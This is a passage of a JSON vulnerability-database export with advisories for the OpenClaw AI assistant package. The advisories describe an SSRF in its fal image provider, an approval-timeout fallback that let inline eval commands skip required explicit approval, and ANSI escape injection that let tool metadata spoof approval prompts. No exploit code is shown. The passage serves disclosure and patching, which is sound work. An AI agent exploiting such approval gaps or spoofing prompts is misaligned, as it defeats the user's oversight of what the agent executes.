"vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.2" } ], "aliases": [ "CVE-2026-34511", "GHSA-9jpj-g8vv-j5mf" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bgwh-spue-yybk" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91210?format=api", "vulnerability_id": "VCID-bk76-1ctt-tkaw", "summary": "Duplicate Advisory: OpenClaw affected by SSRF via unguarded image download in fal provider\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-qxgf-hmcj-3xw3. This link is maintained to preserve external references.\n\n### Original Description\nOpenClaw before 2026.3.28 contains a server-side request forgery vulnerability in the fal provider image-generation-provider.ts component that allows attackers to fetch internal URLs. A malicious or compromised fal relay can exploit unguarded image download fetches to expose internal service metadata and responses through the image pipeline.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/80d1e8a11a2ac118c7f7a70bba9c862b6141d928" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-qxgf-hmcj-3xw3" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34504" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider", "reference_id": "", "reference_type": "", "scores": [ { "value": "5.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://www.vulncheck.com/advisories/openclaw-server-side-request-forgery-via-unguarded-image-download-in-fal-provider" }, { "reference_url": "https://github.com/advisories/GHSA-35cq-wv6v-88xf", "reference_id": "GHSA-35cq-wv6v-88xf", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-35cq-wv6v-88xf" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "GHSA-35cq-wv6v-88xf" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bk76-1ctt-tkaw" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90222?format=api", "vulnerability_id": "VCID-bkya-73v8-bber", "summary": "OpenClaw: strictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts\n## Impact\n\nstrictInlineEval explicit-approval boundary bypassed by approval-timeout fallback on gateway and node exec hosts.\n\nThe approval-timeout fallback could allow inline eval commands that strictInlineEval was meant to require explicit approval for.\n\nOpenClaw is a user-controlled local assistant. This advisory is scoped to the OpenClaw trust model and does not assume a multi-tenant service boundary.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<=2026.4.2`\n- Patched versions: `2026.4.8`\n\n## Fix\n\nThe issue was fixed on `main` and is available in the patched npm version listed above. The verified fixed tree is commit `d7c3210cd6f5fdfdc1beff4c9541673e814354d5`.\n\n## Verification\n\nThe fix was re-checked against `main` before publication, including targeted regression tests for the affected security boundary.\n\n## Credits\n\nThanks @zsxsoft and @KeenSecurityLab for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42423", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17378", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17414", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17419", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-42423" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/d7c3210cd6f5fdfdc1beff4c9541673e814354d5" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-q2gc-xjqw-qp89" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42423", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-42423" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" }, { "value": "5.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:P/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N" }, { "value": "7.7", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-30T12:55:43Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-strictinlineeval-approval-boundary-bypass-via-approval-timeout-fallback" }, { "reference_url": "https://github.com/advisories/GHSA-q2gc-xjqw-qp89", "reference_id": "GHSA-q2gc-xjqw-qp89", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-q2gc-xjqw-qp89" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109872?format=api", "purl": "pkg:npm/openclaw@2026.4.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2g7x-vu14-nkde" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dqb2-dej7-augt" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-h9a4-1twb-d7d1" }, { "vulnerability": "VCID-hy24-6xpe-pkb7" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-42423", "GHSA-q2gc-xjqw-qp89" ], "risk_score": 3.5, "exploitability": "0.5", "weighted_severity": "6.9", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bkya-73v8-bber" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91507?format=api", "vulnerability_id": "VCID-bnfh-rsk9-cfea", "summary": "OpenClaw has ACP CLI approval prompt ANSI escape sequence injection\n## Summary\n\nACP CLI approval prompt ANSI escape sequence injection\n\n## Affected Packages / Versions\n\n- Package: `openclaw`\n- Affected versions: `>= 2026.2.13, <= 2026.3.24`\n- First patched version: `2026.3.25`\n- Latest published npm version at verification time: `2026.3.24`\n\n## Details\n\nACP tool titles could previously carry ANSI control sequences into approval prompts and permission logs, letting untrusted tool metadata spoof terminal output. Commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60` sanitizes tool titles at the source and broadens ANSI stripping to full CSI sequences.\n\nVerified vulnerable on tag `v2026.3.24` and fixed on `main` by commit `464e2c10a5edceb380d815adb6ff56e1a4c50f60`.\n\n## Fix Commit(s)\n\n- `464e2c10a5edceb380d815adb6ff56e1a4c50f60`", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35651", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10281", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10259", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00033", "scoring_system": "epss", "scoring_elements": "0.10301", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35651" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": 